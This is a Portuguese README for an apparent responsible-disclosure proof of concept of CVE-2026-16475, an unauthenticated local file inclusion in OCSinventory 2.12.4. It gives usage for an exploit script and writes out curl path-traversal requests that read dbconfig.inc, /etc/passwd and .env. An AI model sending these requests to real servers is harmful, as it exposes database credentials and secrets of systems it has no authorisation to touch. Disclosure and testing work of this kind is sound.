
Este é o repositório oficial com o PoC do CVE-2026-16475, LFI em OCSinventory 2.12.4.
Vulnerabilidade de Inclusão Local de Arquivo no OCSinventory 2.12.4
ID do CVE: CVE-2026-16475
Pontuação CVSS: 6.9 (Média)
CWE: CWE-98 (Controle Inadequado do Nome do Arquivo para Declaração Include/Require em Programa PHP)
Versão Afetada: OCSinventory 2.12.4
Status: Corrigida nas versões mais recentes
Uma vulnerabilidade de Inclusão Local de Arquivo (LFI) existe no endpoint /ajax/teledeployoptions.php devido à sanitização inadequada do parâmetro linkedoptions antes de seu uso em uma operação dinâmica de inclusão de arquivo XML.
O endpoint foi projetado para carregar arquivos de configuração XML, mas não valida corretamente o parâmetro linkedoptions, permitindo ataques de traversal de caminho.
Um atacante remoto não autenticado pode explorar essa vulnerabilidade para:
pip install -r requirements.txt
python3 exploit.py -u http://target.com -v
Opções:
-u, --url - URL do alvo (obrigatório)-v, --verbose - Saída detalhada (verbose)-o, --output - Salvar leituras bem-sucedidas em arquivoExemplo:
python3 exploit.py -u http://ocs.example.com -v -o results.txt
./lfi_test.sh
Edite a variável BASE_URL no script:
BASE_URL="http://target.com/ajax/teledeployoptions.php"
# Read database config
curl "http://target/ajax/teledeployoptions.php?os=test&linkedoptions=../../../dbconfig.inc"
# Read passwd file
curl "http://target/ajax/teledeployoptions.php?os=test&linkedoptions=../../../../../../../../etc/passwd"
# Read environment file
curl "http://target/ajax/teledeployoptions.php?os=test&linkedoptions=../../../.env"
Para Usuários:
Para Desenvolvedores:
basename() ou funções semelhantes para evitar traversal de caminhoNota: O CVE-2026-16475 é coordenado pelo INCIBE e pode ainda não estar indexado no NVD. Consulte a fonte do INCIBE para obter informações oficiais.
Apenas para Fins Educacionais e Testes Autorizados
Consulte DISCLAIMER.md para obter o aviso legal completo.
Adrián Ferrer Tarí
Divulgação Responsável Coordenada pelo INCIBE